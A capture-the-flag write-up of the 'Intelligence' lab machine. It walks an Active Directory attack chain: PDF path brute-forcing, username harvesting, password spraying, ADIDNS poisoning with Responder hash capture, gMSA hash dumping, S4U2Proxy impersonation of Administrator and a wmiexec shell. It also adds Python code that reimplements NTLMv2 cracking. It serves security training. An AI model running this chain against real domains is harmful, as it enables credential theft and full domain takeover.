Intelligence
IP: 10.10.10.248 | Difficulty: Medium | OS: Windows
Environment Setup
export IP=10.10.10.248
echo "10.10.10.248 intelligence.htb dc.intelligence.htb" >> /etc/hosts
Step 1 — Reconnaissance
Why: Identify open services and domain structure before selecting attack vectors.
nmap -sC -sV -p- --min-rate 10000 -oA nmap/intelligence 10.10.10.248
Output:
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
5985/tcp open http (WinRM)
Key findings:
- Domain: intelligence.htb; DC: dc.intelligence.htb
- HTTP on 80, Kerberos on 88, SMB on 445, LDAP on 389/636/3268, WinRM on 5985: a domain controller with the full AD service set exposed
Step 2 — HTTP — Date-Based Document Enumeration
Why: The web server serves PDFs under /documents/ with predictable names of the form YYYY-MM-DD-upload.pdf. Requesting every date in a two-year window (no directory listing needed) turns up 84 readable documents.
#!/usr/bin/env python3
# Request /documents/YYYY-MM-DD-upload.pdf for every day in the window and
# record the hits in found-docs.txt (the download loop in Step 3 reads it).
import requests
from datetime import date, timedelta

BASE = "http://intelligence.htb/documents/"
start = date(2020, 1, 1)
end = date(2021, 12, 31)

session = requests.Session()  # reuse one connection across ~730 requests
d = start
with open("found-docs.txt", "w") as out:
    while d <= end:
        url = f"{BASE}{d.strftime('%Y-%m-%d')}-upload.pdf"
        r = session.get(url, timeout=5)
        if r.status_code == 200:
            print(f"[+] {url}")
            out.write(url + "\n")
        d += timedelta(days=1)
Output: 84 PDFs found, date range 2020-01-01 through 2021-03-17.
Key findings:
- Unauthenticated access to internal company PDFs by guessing predictable file names (forced browsing of date-stamped paths)
- Documents uploaded by different employees — metadata will expose AD usernames
Step 3 — PDF Metadata — Creator Harvesting
Why: PDF Creator metadata contains Active Directory usernames. Bulk extraction builds a valid user list for Kerberos enumeration.
for url in $(cat found-docs.txt); do wget -q "$url" -P pdfs/; done
# Anchor the grep on "Creator :" so the unrelated "Creator Tool" tag never lands in the user list
exiftool pdfs/*.pdf | grep '^Creator *:' | awk '{print $3}' | sort -u > users.txt
Output:
Anita.Roberts Brian.Morris Daniel.Shelton
David.Mcbride David.Reed Ian.Duncan
Jason.Patterson Jennifer.Thomas Jessica.Moody
Jose.Williams Kaitlyn.Zimmerman Kelly.Long
Nicole.Brock Richard.Williams Samuel.Richardson
Scott.Scott Stephanie.Young Ted.Graves
Teresa.Williamson Thomas.Valenzuela Tiffany.Molina
William.Lee
Key findings: 22 unique AD usernames in Firstname.Lastname format harvested from PDF Creator fields.
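Added example, not code from the original writeup: a byte-level extractor for the /Creator entry that exiftool is reading above, so you can see exactly which bytes in the file carry the username and why the Firstname.Lastname values survive intact. It handles both PDF string encodings (a literal string with backslash escapes and a hex string with a UTF-16BE BOM). The SAMPLE_PDFS byte strings are constructed stand-ins for the downloaded documents, not files from the box, and the function names are mine.

```python
import re

# /Creator in the PDF Info dictionary, either a literal string "(...)" (backslash
# escapes allowed; unescaped nested parentheses are not handled) or a hex string "<...>".
CREATOR_RE = re.compile(rb"/Creator\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)", re.S)


def decode_pdf_string(raw: bytes) -> str:
    """PDF text strings are UTF-16BE when they start with a BOM, else PDFDocEncoding (Latin-1 here)."""
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", "replace")
    return raw.decode("latin-1")


def pdf_creators(pdf: bytes) -> list:
    """Every /Creator value in the file; incremental updates can leave more than one Info dict."""
    found = []
    for m in CREATOR_RE.finditer(pdf):
        if m.group(2) is not None:
            raw = bytes.fromhex(m.group(2).decode("ascii"))
        else:
            # \( \) \\ are real escapes; a backslash before any other byte is simply dropped
            raw = re.sub(rb"\\(.)", rb"\1", m.group(1), flags=re.S)
        found.append(decode_pdf_string(raw))
    return found


def harvest_users(pdfs: dict) -> list:
    """Sorted unique Creator values across a set of files, like the exiftool | sort -u pipeline."""
    users = set()
    for data in pdfs.values():
        users.update(c.strip() for c in pdf_creators(data) if c.strip())
    return sorted(users)


# Constructed stand-ins for the downloaded documents. Real files usually keep the Info
# dictionary inside a compressed object stream, which this byte-level scan does not inflate.
SAMPLE_PDFS = {
    "2020-01-01-upload.pdf": b"%PDF-1.4\n1 0 obj\n<< /Producer (LibreOffice 6.4) /Creator (Jose.Williams) >>\nendobj\n%%EOF\n",
    "2020-01-02-upload.pdf": b"%PDF-1.4\n2 0 obj\n<< /Creator <FEFF00570069006C006C00690061006D002E004C00650065> /Title (Memo) >>\nendobj\n",
    "2020-01-04-upload.pdf": b"%PDF-1.4\n3 0 obj\n<< /Creator (Scott\\.Scott) >>\nendobj\n",  # stray escape, decodes to Scott.Scott
}

if __name__ == "__main__":
    for user in harvest_users(SAMPLE_PDFS):
        print(user)
```

exiftool stays the tool for the bulk run because it inflates object streams and reads XMP as well; the extractor is the mental model for what the field looks like and for spotting a document whose Creator was set to something other than an account name.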
Step 4 — Kerbrute — Validate AD Usernames
Why: Confirm which harvested names are real domain accounts before spraying. Kerbrute sends an AS-REQ without pre-authentication for each name; the KDC answers KDC_ERR_PREAUTH_REQUIRED for existing accounts and KDC_ERR_C_PRINCIPAL_UNKNOWN for unknown ones, so nothing here touches badPwdCount or lockout counters.
kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt
Key findings: All 22 usernames validated as active domain accounts.
Step 5 — PDF Content — Default Password Discovery
Why: One of the harvested PDFs (2020-06-04) is an IT policy document announcing the company default password for new accounts.
pdftotext pdfs/2020-06-04-upload.pdf -
Key findings: The document tells new starters "Please change your default password: NewIntelligenceCorpUser9876", i.e. a single known initial password for every onboarded account.
Step 6 — Password Spray — Tiffany.Molina
Why: New accounts may never have changed the default. Spray that one password across all 22 validated users: one attempt per account per round keeps each account's badPwdCount at 1, under any sane lockout threshold. Before a second round with another password, read the lockout threshold and observation window (crackmapexec --pass-pol once you hold any credential) and wait it out.
crackmapexec smb intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --continue-on-success
Output:
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
Key findings: Valid foothold: Tiffany.Molina:NewIntelligenceCorpUser9876
Step 7 — SMB Enumeration — IT Share
Why: Authenticated SMB enumeration reveals a readable IT share containing a scheduled PowerShell script that becomes our NTLM relay vector.
smbclient //intelligence.htb/IT -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'
smb: \> get downdetector.ps1
Output:
foreach($record in Get-ChildItem "AD:DC=intelligence.htb" | Where-Object Name -like "web*") {
    $r = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
}
Key findings:
- Script runs as Ted.Graves every 5 minutes, reads the web* records from the AD-integrated DNS zone and requests http://<name>/ for each one
- -UseDefaultCredentials sends the caller's Windows credentials, i.e. NTLM (NetNTLMv2) authentication, to whatever host answers, so owning a web* record puts Responder in the path
Step 8 — ADIDNS Poisoning — Rogue DNS Record
Why: By default Authenticated Users may create child objects in the AD-integrated DNS zone, so any domain user (Tiffany.Molina included) can add records. Adding a web* A record that points at our VPN address makes Ted.Graves's scheduled script authenticate to our Responder on its next run.
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' \
--record 'webattacker' --action add --data 10.10.14.X dc.intelligence.htb
Output:
[+] Bind OK
[+] LDAP operation completed successfully
nslookup webattacker.intelligence.htb 10.10.10.248
# webattacker.intelligence.htb = 10.10.14.X ✓
Key findings: DNS A record added — Ted.Graves's task will authenticate to us on next run.
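Added example, not code from the original writeup or from krbrelayx: what dnstool.py actually writes. The new record becomes one dnsRecord attribute value on a dnsNode object (DC=webattacker,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence.htb) in the DNS_RPC_RECORD layout below, with Rank 0xF0 and a big-endian TTL. The same decoder lets a defender pull every dnsRecord over LDAP and flag names that resolve outside the expected address space. SAMPLE_ZONE is constructed, 10.10.14.5 stands in for the 10.10.14.X VPN address, and the function names are mine.

```python
import ipaddress
import struct

DNS_TYPE_A = 0x0001
RANK_ZONE = 0xF0   # authoritative zone data, the rank dnstool.py sets on records it adds


def build_a_record(ip: str, ttl: int = 180, serial: int = 0) -> bytes:
    """Serialize a DNS_RPC_RECORD (MS-DNSP 2.2.2.2.5) carrying one A record.

    Layout: DataLength, Type, Version(=5), Rank, Flags, Serial (little-endian),
    TtlSeconds (big-endian), Reserved, TimeStamp, then the record data.
    """
    data = ipaddress.IPv4Address(ip).packed
    header = struct.pack("<HHBBHL", len(data), DNS_TYPE_A, 5, RANK_ZONE, 0, serial)
    return header + struct.pack(">L", ttl) + struct.pack("<LL", 0, 0) + data


def parse_record(blob: bytes) -> dict:
    """Decode one dnsRecord attribute value; adds 'address' for A records."""
    if len(blob) < 24:
        raise ValueError("dnsRecord too short")
    length, rtype, version, rank, _flags, serial = struct.unpack_from("<HHBBHL", blob, 0)
    (ttl,) = struct.unpack_from(">L", blob, 12)
    data = blob[24:24 + length]
    rec = {"type": rtype, "version": version, "rank": rank, "serial": serial, "ttl": ttl}
    if rtype == DNS_TYPE_A and length == 4:
        rec["address"] = str(ipaddress.IPv4Address(data))
    return rec


def rogue_a_records(nodes: dict, trusted_nets) -> list:
    """Defender-side check: which dnsNode names carry A records outside the trusted ranges?

    `nodes` maps the dnsNode name (the DC= RDN under CN=MicrosoftDNS) to its raw dnsRecord
    values, as an LDAP search over the DomainDnsZones partition returns them.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    hits = []
    for name, blobs in nodes.items():
        for blob in blobs:
            addr = parse_record(blob).get("address")
            if addr and not any(ipaddress.ip_address(addr) in n for n in nets):
                hits.append((name, addr))
    return hits


# Constructed sample zone: the DC's own record plus the attacker-added web* node.
SAMPLE_ZONE = {
    "dc": [build_a_record("10.10.10.248", ttl=3600)],
    "webattacker": [build_a_record("10.10.14.5")],   # stands in for the 10.10.14.X VPN address
}

if __name__ == "__main__":
    print(build_a_record("10.10.14.5").hex())
    for name, addr in rogue_a_records(SAMPLE_ZONE, ["10.10.10.0/24"]):
        print(f"[!] {name}.intelligence.htb -> {addr} is outside the trusted ranges")
```

The audit hook is the object itself, not just the address: a dnsNode whose owner in nTSecurityDescriptor is an ordinary user account (Tiffany.Molina here, since the creator becomes the owner) has no business existing in a production zone, whatever it resolves to.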
Step 9 — Responder — NTLMv2 Hash Capture
Why: Responder's HTTP listener answers the script's request with a 401 demanding NTLM; Invoke-WebRequest -UseDefaultCredentials completes the handshake as Ted.Graves, and the NetNTLMv2 challenge-response is logged in hashcat format for offline cracking. Start Responder before the record is added, or at least within the 5-minute window.
sudo responder -I tun0
# Wait ~5 min for scheduled task to fire
Output:
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:<server_challenge>:<NTProofStr>:<blob>
# copy the whole line, username included, into ted.hash; hashcat -m 5600 parses that layout as-is
hashcat -m 5600 ted.hash /usr/share/wordlists/rockyou.txt
Key findings: Cracked: Ted.Graves:Mr.Teddy
Step 10 — BloodHound — ACL Mapping
Why: BloodHound maps the full escalation path from Ted.Graves to Domain Admin via AD ACL relationships.
bloodhound-python -u 'Ted.Graves' -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
Output:
Ted.Graves → MemberOf → ITSUPPORT
ITSUPPORT → ReadGMSAPassword → svc_int$
svc_int$ → AllowedToDelegate → dc.intelligence.htb (msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb)
→ Impersonate Administrator
Key findings:
- ITSUPPORT has ReadGMSAPassword on svc_int$, so Ted.Graves can read msDS-ManagedPassword and derive the account's NT hash
- svc_int$ is trusted for constrained delegation to a service on dc.intelligence.htb (WWW/dc.intelligence.htb), so S4U2Self + S4U2Proxy yields a service ticket for the DC as Administrator
Step 11 — gMSADumper — Recover svc_int$ Hash
Why: ITSUPPORT has ReadGMSAPassword over svc_int$. gMSADumper reads the msDS-ManagedPassword blob over LDAP (the attribute is only returned to principals listed in msDS-GroupMSAMembership) and computes the NT hash of the current password locally.
python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb
Output:
svc_int$:::33bd09dcd697600edf6b3a7af4875767
Key findings: svc_int$ NT hash recovered. The managed password rotates (30 days by default), so re-dump it if a later ticket request fails. The account has AllowedToDelegate to WWW/dc.intelligence.htb.
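Added example serving Step 9 and Step 11, not code from the writeup or from Responder, hashcat or gMSADumper: it rebuilds the two hash computations those steps rely on. First, what a 5600 line contains and what hashcat does per candidate: NT hash = MD4(UTF-16LE password), NTLMv2 key = HMAC-MD5 over upper(user)||domain, NTProofStr = HMAC-MD5 over server challenge||blob. Second, what gMSADumper does with msDS-ManagedPassword: parse the MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.22) and MD4 the current password bytes. MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds. SAMPLE_CHALLENGE, SAMPLE_BLOB and the blob built by build_gmsa_blob are constructed inputs, not captures from the box, and the function names are mine.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib's md4 is frequently disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda v, s: ((v << s) | (v >> (32 - s))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    R2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    R3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1
            a = rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + G(b, c, d) + X[R2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + H(b, c, d) + X[R3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); the key every NTLM exchange is built on."""
    return md4(password.encode("utf-16le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NT, upper(user)||domain), server_challenge||blob)."""
    v2_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()
    return hmac.new(v2_key, server_challenge + blob, hashlib.md5).digest()


def capture_line(password, user, domain, server_challenge, blob) -> str:
    """Format the exchange the way Responder logs it (hashcat -m 5600 layout)."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_line(line: str, candidates):
    """What hashcat does per candidate: recompute NTProofStr from the logged fields and compare."""
    user, _, domain, chal, proof, blob = line.split(":", 5)
    chal_b, blob_b = bytes.fromhex(chal), bytes.fromhex(blob)
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(pw, user, domain, chal_b, blob_b).hex(), proof):
            return pw
    return None


def gmsa_nt_hash(blob: bytes) -> bytes:
    """Parse MSDS-MANAGEDPASSWORD_BLOB and hash CurrentPassword the way gMSADumper does."""
    version, _, length, cur_off, prev_off, qpi_off, _ = struct.unpack_from("<HHIHHHH", blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not an MSDS-MANAGEDPASSWORD_BLOB")
    raw = blob[cur_off:prev_off or qpi_off]   # CurrentPassword runs up to the next field
    pw = b""
    for i in range(0, len(raw) - 1, 2):       # stop at the UTF-16LE NUL terminator
        if raw[i:i + 2] == b"\x00\x00":
            break
        pw += raw[i:i + 2]
    return md4(pw)                             # already UTF-16LE bytes, no re-encoding


def build_gmsa_blob(password_utf16le: bytes, query_interval: int = 0, unchanged_interval: int = 0) -> bytes:
    """Constructed blob in the same layout; exists only to give the parser sample input."""
    cur = password_utf16le + b"\x00\x00"
    pad = (-(16 + len(cur))) % 8               # the two interval fields are 8-byte aligned
    qpi_off = 16 + len(cur) + pad
    header = struct.pack("<HHIHHHH", 1, 0, qpi_off + 16, 16, 0, qpi_off, qpi_off + 8)
    return header + cur + b"\x00" * pad + struct.pack("<QQ", query_interval, unchanged_interval)


# Constructed sample: a server challenge and an NTLMv2 blob shaped like a real one.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex(
    "0101000000000000"                  # RespType, HiRespType, reserved
    "c0653150de09d201"                  # timestamp
    "aabbccddeeff0011"                  # client challenge
    "00000000"                          # reserved
    "02000c0049004e00540045004c004c00"  # AvPair: NetBIOS domain "INTELL" (constructed)
    "00000000"                          # MsvAvEOL
    "00000000")                         # trailing reserved
SAMPLE_LINE = capture_line("Mr.Teddy", "Ted.Graves", "intelligence", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_line(SAMPLE_LINE, ["Summer2021", "Mr.Teddy"]))
    print("gMSA NT:", gmsa_nt_hash(build_gmsa_blob("password".encode("utf-16le"))).hex())
```

The cracking loop manages a few thousand guesses per second in Python; it is there to show the check, hashcat stays the tool for rockyou. Note that the domain goes into the key exactly as captured while the user is upper-cased; getting that wrong is the usual reason a hand-rolled verifier rejects a valid password.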
Step 12 — S4U2Proxy — Impersonate Administrator
Why: svc_int$ is trusted for constrained delegation to WWW/dc.intelligence.htb (its msDS-AllowedToDelegateTo entry). getST.py first runs S4U2Self to obtain a ticket to svc_int$ as Administrator, then S4U2Proxy to exchange it for a service ticket to that SPN. Request exactly the SPN in the delegation list, the KDC rejects any other; the service class in the name is not checked by the target host because the ticket is encrypted with the DC computer account's key, so a WWW/ ticket is accepted by WMI and SMB on dc. This works because Administrator is neither in Protected Users nor marked "sensitive, cannot be delegated". Two things commonly break the step: clock skew (KRB_AP_ERR_SKEW; sync with the DC first, e.g. sudo ntpdate dc.intelligence.htb) and the gMSA password having rotated since the dump (re-run gMSADumper).
python3 getST.py intelligence.htb/svc_int$ -hashes :33bd09dcd697600edf6b3a7af4875767 \
-spn WWW/dc.intelligence.htb -impersonate Administrator
export KRB5CCNAME=Administrator.ccache
Output:
[*] Impersonating Administrator
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Key findings: The KDC issued a service ticket for WWW/dc.intelligence.htb with Administrator as the client (S4U2Proxy, not a forged ticket). Exporting KRB5CCNAME to the file getST wrote makes impacket tools use it for pass-the-ticket.
Step 13 — WMIExec — Administrator Shell
Why: The ccache holds a service ticket for the DC as Administrator, so wmiexec -k -no-pass authenticates with Kerberos and needs no password or hash. The target must be addressed by the hostname in the ticket (dc.intelligence.htb), not by IP, or the ticket will not be used.
python3 wmiexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Output:
C:\> whoami
intelligence\administrator
C:\Users\Administrator\Desktop> type root.txt
<REDACTED>
Key findings: 🏴 MACHINE PWNED — DOMAIN ADMIN ACHIEVED
Credentials
| Account | Secret |
|---|---|
| Tiffany.Molina | NewIntelligenceCorpUser9876 |
| Ted.Graves | Mr.Teddy |
| svc_int$ | 33bd09dcd697600edf6b3a7af4875767 (NT) |
Full Attack Chain
HTTP /documents/ date brute-force → 84 PDFs
└─ exiftool PDF Creator metadata → 22 AD usernames
└─ 2020-06-04-upload.pdf → default: NewIntelligenceCorpUser9876
└─ Password spray → Tiffany.Molina:NewIntelligenceCorpUser9876
└─ SMB //IT/downdetector.ps1 → runs as Ted.Graves, queries web* DNS
└─ dnstool.py ADIDNS add webattacker A → 10.10.14.X
└─ Responder NTLMv2 → Ted.Graves:Mr.Teddy
└─ BloodHound: ITSUPPORT → ReadGMSAPassword → svc_int$
└─ gMSADumper → svc_int$ NT hash
└─ getST.py S4U2Proxy -impersonate Administrator
└─ wmiexec -k → DA shell
🏴 ROOTED
© 0xNRG — Intelligence pwned — 2022-01-08